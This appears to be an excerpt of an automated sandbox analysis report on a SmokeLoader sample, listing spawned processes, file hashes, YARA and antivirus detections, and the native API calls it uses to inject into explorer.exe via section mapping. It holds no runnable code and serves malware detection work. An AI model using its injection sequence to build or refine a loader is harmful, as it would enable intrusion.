                      MD5 hash:9C0DE297B9EA30FFBE100EE12150F122
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      Target ID:1
                      Start time:02:23:39
                      Start date:28/05/2024
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff72b770000
                      File size:5'141'208 bytes
                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:5
                      Start time:02:23:58
                      Start date:28/05/2024
                      Path:C:\Users\user\AppData\Roaming\rrrrcve
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\rrrrcve
                      Imagebase:0x400000
                      File size:37'888 bytes
                      MD5 hash:9C0DE297B9EA30FFBE100EE12150F122
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\rrrrcve, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 55%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:6
                      Start time:02:24:00
                      Start date:28/05/2024
                      Path:C:\Windows\SysWOW64\explorer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\explorer.exe
                      Imagebase:0x860000
                      File size:4'514'184 bytes
                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:7
                      Start time:02:24:01
                      Start date:28/05/2024
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\explorer.exe
                      Imagebase:0x7ff72b770000
                      File size:5'141'208 bytes
                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:8
                      Start time:02:24:02
                      Start date:28/05/2024
                      Path:C:\Windows\SysWOW64\explorer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\explorer.exe
                      Imagebase:0x7ff6ec4b0000
                      File size:4'514'184 bytes
                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:9
                      Start time:02:24:03
                      Start date:28/05/2024
                      Path:C:\Windows\SysWOW64\explorer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\explorer.exe
                      Imagebase:0x860000
                      File size:4'514'184 bytes
                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:false

                      Target ID:10
                      Start time:02:24:04
                      Start date:28/05/2024
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\explorer.exe
                      Imagebase:0x7ff72b770000
                      File size:5'141'208 bytes
                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:11
                      Start time:02:24:05
                      Start date:28/05/2024
                      Path:C:\Windows\SysWOW64\explorer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\explorer.exe
                      Imagebase:0x860000
                      File size:4'514'184 bytes
                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate
                      Has exited:false

                      Target ID:14
                      Start time:02:24:05
                      Start date:28/05/2024
                      Path:C:\Windows\System32\WerFault.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\WerFault.exe -u -p 7716 -s 700
                      Imagebase:0x7ff67a630000
                      File size:570'736 bytes
                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:15
                      Start time:02:24:06
                      Start date:28/05/2024
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\explorer.exe
                      Imagebase:0x7ff72b770000
                      File size:5'141'208 bytes
                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.2941442653.0000000000F71000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:high
                      Has exited:false

                      Target ID:16
                      Start time:02:24:07
                      Start date:28/05/2024
                      Path:C:\Windows\SysWOW64\explorer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\explorer.exe
                      Imagebase:0x860000
                      File size:4'514'184 bytes
                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:false

                      Target ID:17
                      Start time:02:24:08
                      Start date:28/05/2024
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\explorer.exe
                      Imagebase:0x7ff72b770000
                      File size:5'141'208 bytes
                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false


                        Execution Graph

                        Execution Coverage:7.6%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:50%
                        Total number of Nodes:48
                        Total number of Limit Nodes:1
                        Execution graph (rendered graph omitted): entry nodes 402d65, 4018b1, 4014d6, 402dfe and 4018be; function 4014bf makes 7 API calls (NtDuplicateObject, NtCreateSection, NtMapViewOfSection) and function 4018a6 makes 8 API calls (Sleep plus those of 4014bf).

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted; executed/not-executed colouring not recoverable): function 4014d6, basic blocks 4014c4-4018a3, calls 401164 and 401690, APIs NtDuplicateObject, NtCreateSection, NtMapViewOfSection.
                        APIs
                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: Section$CreateDuplicateObjectView
                        • String ID:
                        • API String ID: 1652636561-0
                        • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                        • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                        • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                        • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted; executed/not-executed colouring not recoverable): function 4014bf, basic blocks 4014bf-4018a3, calls 401164 and 401690, APIs NtDuplicateObject, NtCreateSection, NtMapViewOfSection.
                        APIs
                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: Section$View$Create$DuplicateObject
                        • String ID:
                        • API String ID: 1546783058-0
                        • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                        • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                        • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                        • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted; executed/not-executed colouring not recoverable): function 4014e8, basic blocks 4014e0-4018a3, calls 401164 and 401690, APIs NtDuplicateObject, NtCreateSection, NtMapViewOfSection.
                        APIs
                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: Section$View$Create$DuplicateObject
                        • String ID:
                        • API String ID: 1546783058-0
                        • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                        • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                        • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                        • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted; executed/not-executed colouring not recoverable): function 4014eb, basic blocks 4014eb-4018a3, calls 401164 and 401690, APIs NtDuplicateObject, NtCreateSection, NtMapViewOfSection.
                        APIs
                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: Section$View$Create$DuplicateObject
                        • String ID:
                        • API String ID: 1546783058-0
                        • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                        • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                        • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                        • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted; executed/not-executed colouring not recoverable): function 4018c5, basic blocks 4018c5-40195b, calls 401164, 4013cc and 4014bf, API Sleep.
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: CreateDuplicateObjectSectionSleep
                        • String ID: zOji
                        • API String ID: 4152845823-4118548424
                        • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                        • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                        • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                        • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted; executed/not-executed colouring not recoverable): function 4018a6, basic blocks 4018a6-40195b, calls 401164, 4013cc and 4014bf, API Sleep.
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: CreateDuplicateObjectSectionSleep
                        • String ID:
                        • API String ID: 4152845823-0
                        • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                        • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                        • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                        • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted; executed/not-executed colouring not recoverable): function 4018be, basic blocks 4018be-40195b, calls 401164, 4013cc and 4014bf, API Sleep.
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: CreateDuplicateObjectSectionSleep
                        • String ID:
                        • API String ID: 4152845823-0
                        • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                        • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
                        • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                        • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted; executed/not-executed colouring not recoverable): function 4018b1, basic blocks 4018b1-40195b, calls 401164, 4013cc and 4014bf, API Sleep.
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                        • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                        • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                        • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted; executed/not-executed colouring not recoverable): function 4018c2, basic blocks 4018c2-40195b, calls 401164, 4013cc and 4014bf, API Sleep.
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: CreateDuplicateObjectSectionSleep
                        • String ID:
                        • API String ID: 4152845823-0
                        • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                        • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                        • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                        • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

                        Control-flow Graph

                        Control-flow graph (rendered graph omitted; executed/not-executed colouring not recoverable): function 4018da, basic blocks 4018da-40195b, calls 401164, 4013cc and 4014bf, API Sleep.
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 004018F6
                          • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                          • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID: CreateDuplicateObjectSectionSleep
                        • String ID:
                        • API String ID: 4152845823-0
                        • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                        • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
                        • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                        • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                        • Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
                        • Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                        • Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                        • Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
                        • Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                        • Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                        • Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
                        • Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
